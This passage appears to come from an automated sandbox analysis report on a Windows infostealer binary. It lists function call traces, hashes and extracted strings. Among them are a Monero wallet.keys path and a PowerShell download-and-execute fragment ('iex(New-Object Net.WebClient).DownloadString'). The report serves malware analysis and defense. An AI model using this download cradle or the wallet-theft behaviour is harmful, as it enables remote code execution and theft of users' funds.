                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                    • LocalFree.KERNEL32(0063148F), ref: 00639A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 9b5113d470399e149099a0b335645be6f790a7d990a08d04dafd90b5c06e5962
                    • Instruction ID: 1ea715660b8077dc3d890998b55507f8612ee3afb81cebe64c2f7c8a3574e5e3
                    • Opcode Fuzzy Hash: 9b5113d470399e149099a0b335645be6f790a7d990a08d04dafd90b5c06e5962
                    • Instruction Fuzzy Hash: 24312B74A00209EFDB14DF94C889BEE77B6FF48341F108258E915A7394D775A981CFA1
                    Function 0064C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Typememset
                    • String ID:
                    • API String ID: 3530896902-3916222277
                    • Opcode ID: a9922661b219bf2438093a7261df30d8d2fc5a9286099c04b5d7cbac8dfb406c
                    • Instruction ID: 529c2c9e4f4806cc137be50168374e2c163109c5f2bfe8b008fd7ff5aab0cc5a
                    • Opcode Fuzzy Hash: a9922661b219bf2438093a7261df30d8d2fc5a9286099c04b5d7cbac8dfb406c
                    • Instruction Fuzzy Hash: 2F41277150175CAEDB618B24CC84FFBBBEA9F45314F1444ECE9CA86282D2719A45DF24
                    Function 00644780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(?,014503C0), ref: 006447DB
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644801
                    • lstrcat.KERNEL32(?,?), ref: 00644820
                    • lstrcat.KERNEL32(?,?), ref: 00644834
                    • lstrcat.KERNEL32(?,0143CA18), ref: 00644847
                    • lstrcat.KERNEL32(?,?), ref: 0064485B
                    • lstrcat.KERNEL32(?,0144E5A0), ref: 0064486F
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648D90: GetFileAttributesA.KERNEL32(00000000,?,00631B54,?,?,0065564C,?,?,00650E1F), ref: 00648D9F
                      • Part of subcall function 00644570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00644580
                      • Part of subcall function 00644570: RtlAllocateHeap.NTDLL(00000000), ref: 00644587
                      • Part of subcall function 00644570: wsprintfA.USER32 ref: 006445A6
                      • Part of subcall function 00644570: FindFirstFileA.KERNEL32(?,?), ref: 006445BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 1c489fbd10a0c0f78d5f2a0fa827f8dd9750361676dfb1ccc5ec673d7d1dfc1a
                    • Instruction ID: 162fccdc29c5e1cf4d7e5a3c65491fab5471f6e55584478cceedc7f781730e80
                    • Opcode Fuzzy Hash: 1c489fbd10a0c0f78d5f2a0fa827f8dd9750361676dfb1ccc5ec673d7d1dfc1a
                    • Instruction Fuzzy Hash: 7F3160B2900208ABCB54FBA0DC89EED7379BB48700F44459DB31996081EE74D6C98B9A
                    Function 00642C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00642D85
                    Strings
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00642D04
                    • ')", xrefs: 00642CB3
                    • <, xrefs: 00642D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00642CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: 0644a4e5255ee7fa7c04fcbfd80e7b1ba8132b2d6c7b4e427a272d02e9acb590
                    • Instruction ID: 1ecd78e6d9ca5f9d69530701d6249d2d18851f3cbbe6ae47ea396fbe9aefb638
                    • Opcode Fuzzy Hash: 0644a4e5255ee7fa7c04fcbfd80e7b1ba8132b2d6c7b4e427a272d02e9acb590
                    • Instruction Fuzzy Hash: 6041EC71C50208AEEB54EFE0C892BEDBB76AF14304F50411DF406A7192DF746A8ACF95
                    Function 00639E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00639F41
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: a6db3b74392d68df59ebcce0fe7a7945a7ffbc37c43e66a9482d5f4c2b7dec57
                    • Instruction ID: 7f143612c3578a10b4df88f1a2ceb1bee750e6686f0559b57eaf0bb9f068c34d
                    • Opcode Fuzzy Hash: a6db3b74392d68df59ebcce0fe7a7945a7ffbc37c43e66a9482d5f4c2b7dec57
                    • Instruction Fuzzy Hash: F9615075A40208AFEB28EFA4CD96FED7776AF45304F00801CF90A5F191DB746A46CB96
                    Function 006470D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • memset.MSVCRT ref: 0064716A
                    Strings
                    • sd, xrefs: 006472AE, 00647179, 0064717C
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0064718C
                    • sd, xrefs: 00647111
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpymemset
                    • String ID: sd$sd$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 4047604823-582212991
                    • Opcode ID: d77cedc55126bb76f997b9497bf6e7457c99dbc238f83773d5466f538ee028d1
                    • Instruction ID: caf90a67edc187a76edf003e57ecd289570094e81a6ad674ee227118df7660d2
                    • Opcode Fuzzy Hash: d77cedc55126bb76f997b9497bf6e7457c99dbc238f83773d5466f538ee028d1
                    • Instruction Fuzzy Hash: 2B516DB0D44218AFDB64EBA0DC85BEEB376AF54304F1440ACE51577281EB746E88CF59
                    Function 00647E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0143D430,00000000,00020119,?), ref: 00647E5E
                    • RegQueryValueExA.ADVAPI32(?,0144E840,00000000,00000000,000000FF,000000FF), ref: 00647E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00647E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: dbc752a6777f0cbe973f3702365b0cc7e94add59d010d9d752f860b0cca79ac4
                    • Instruction ID: eeb0530ac28122dc7b81af035a25a0cde7d620a3a42f6f949d8d91097ba24e7d
                    • Opcode Fuzzy Hash: dbc752a6777f0cbe973f3702365b0cc7e94add59d010d9d752f860b0cca79ac4
                    • Instruction Fuzzy Hash: C211A0B1A44205EBD708CF94DC49FBFBBBDFB44B01F104269FA09A7284D77498418BA2
                    Function 00649260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.SHLWAPI(01450348,?,?,?,0064140C,?,01450348,00000000), ref: 0064926C
                    • lstrcpyn.KERNEL32(0087AB88,01450348,01450348,?,0064140C,?,01450348), ref: 00649290
                    • lstrlen.KERNEL32(?,?,0064140C,?,01450348), ref: 006492A7
                    • wsprintfA.USER32 ref: 006492C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: 320e53cddf6a0be511074b2aae754b75e909c05e0957515ab13dc67d1dec699a
                    • Instruction ID: 886653741c46a9b0fd41feb49444aace6f3dc2713fd99b6b34a87bf76e0e6630
                    • Opcode Fuzzy Hash: 320e53cddf6a0be511074b2aae754b75e909c05e0957515ab13dc67d1dec699a
                    • Instruction Fuzzy Hash: 9B01A975500108FFCB08DFE8C988EAE7BB9FB84365F108148F9099B208C671EA40DBA1
                    Function 006312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006312B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006312BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006312D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006312F5
                    • RegCloseKey.ADVAPI32(?), ref: 006312FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 4859acf301ef02447925c5ba09a68dd09369dd76db669f7f4acb0d4d22187b52
                    • Instruction ID: cbd8f9437713797e06d99a6abed02a9304b65ef7bdd117e52ace84a90dd9966a
                    • Opcode Fuzzy Hash: 4859acf301ef02447925c5ba09a68dd09369dd76db669f7f4acb0d4d22187b52
                    • Instruction Fuzzy Hash: C70136B5A40208BBDB04DFD0DC4DFAEB7B8FB88701F008155FA0997284D671DA418F51
                    Function 00646630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00646663
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00646726
                    • ExitProcess.KERNEL32 ref: 00646755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
